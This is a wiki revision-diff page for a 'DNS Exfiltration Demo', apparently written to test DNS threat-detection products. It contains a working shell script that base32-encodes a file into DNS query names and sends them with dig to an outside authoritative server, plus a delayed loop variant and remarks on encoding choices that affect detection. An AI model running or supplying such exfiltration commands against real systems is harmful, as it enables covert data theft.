Saucepan

User Tools

Site Tools

Trace: dns_servers lets_encrypt_main
dns:dns_exfiltration

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
dns:dns_exfiltration [2023/10/02 13:59] bstafforddns:dns_exfiltration [2023/11/29 15:02] (current) – [DNS Exfiltration Demo] bstafford
Line 1: Line 1:
 ===== DNS Exfiltration Demo ===== ===== DNS Exfiltration Demo =====
 [[https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/|Guide here]] [[https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/|Guide here]]
 +===== Base64 =====
 +Base64. Contains uppercase letters and defaults to allowing = and / etc. This is not recommended as it can make it easier to detect attacks as 'normal' DNS doesn't use these. Use Base32 instead.
 +
 +However, Base32 isn't available natively in many scripting toolsets. Base64 is. So some attackers use Base64 to avoid having to write their own Base32 conversion code.
 +
 +
  
  
Line 7: Line 13:
  
 Note that this is actually two scripts as the last few commands are to be run on the DNS auth server to decrypt the logs. Note that this is actually two scripts as the last few commands are to be run on the DNS auth server to decrypt the logs.
-<code> +<code># File to be exfiltrated
-# File to be exfiltrated+
 SOURCE=/home/name/dns_exfil_test/file.pdf SOURCE=/home/name/dns_exfil_test/file.pdf
  
Line 22: Line 27:
  
 # Target DNS server (e.g. NIOS with DFP or BloxOne Host) # Target DNS server (e.g. NIOS with DFP or BloxOne Host)
-LOCALDNS=192.168.11.154+# Public IP is the BloxOne Threat Defense IP address 
 +#LOCALDNS=192.168.11.154 
 +LOCALDNS=52.119.41.100
  
-# Log file that the DNS queries can be found in on the authoratative DNS server +# Log file that the DNS queries can be found in on the authoritative DNS server 
-BIND_LOG_FILE=/var/log/named/query.log]+BIND_LOG_FILE=/var/log/named/query.log
  
-# File to put the decrypted, received file into (should be a replicat of SOURCE)+# File to put the decrypted, received file into (should be a replica of SOURCE)
 DECRYPTEDOUTPUT=/home/name/dns_exfil_test/file2.pdf DECRYPTEDOUTPUT=/home/name/dns_exfil_test/file2.pdf
  
Line 39: Line 46:
 base32 $SOURCE | tr -d '\n' | fold -62 | sed -e "s/$/.$SUBDOM.$DOMAIN/" | nl | sed s/^' '*//g | sed "s/\\t/./g" > $ENCRYPTED base32 $SOURCE | tr -d '\n' | fold -62 | sed -e "s/$/.$SUBDOM.$DOMAIN/" | nl | sed s/^' '*//g | sed "s/\\t/./g" > $ENCRYPTED
  
-# The result is a file that contains a hugh list of FQDN's for us to query (exfiltrate)+# The result is a file that contains a huge list of FQDN's for us to query (exfiltrate)
  
-Use DIG to iterate over the file and resolve the DNS at full speed.+Exfiltrate the file with DIG.
 dig +short A @$LOCALDNS -f $ENCRYPTED dig +short A @$LOCALDNS -f $ENCRYPTED
- 
-# OR - if you want to add a delay into the exfiltration, use the following line. 
-# for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep ;done 
  
  
 +# Delay if required.
 +#for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep 0.1 ;done
  
  
dns/dns_exfiltration.1696255155.txt.gz · Last modified: by bstafford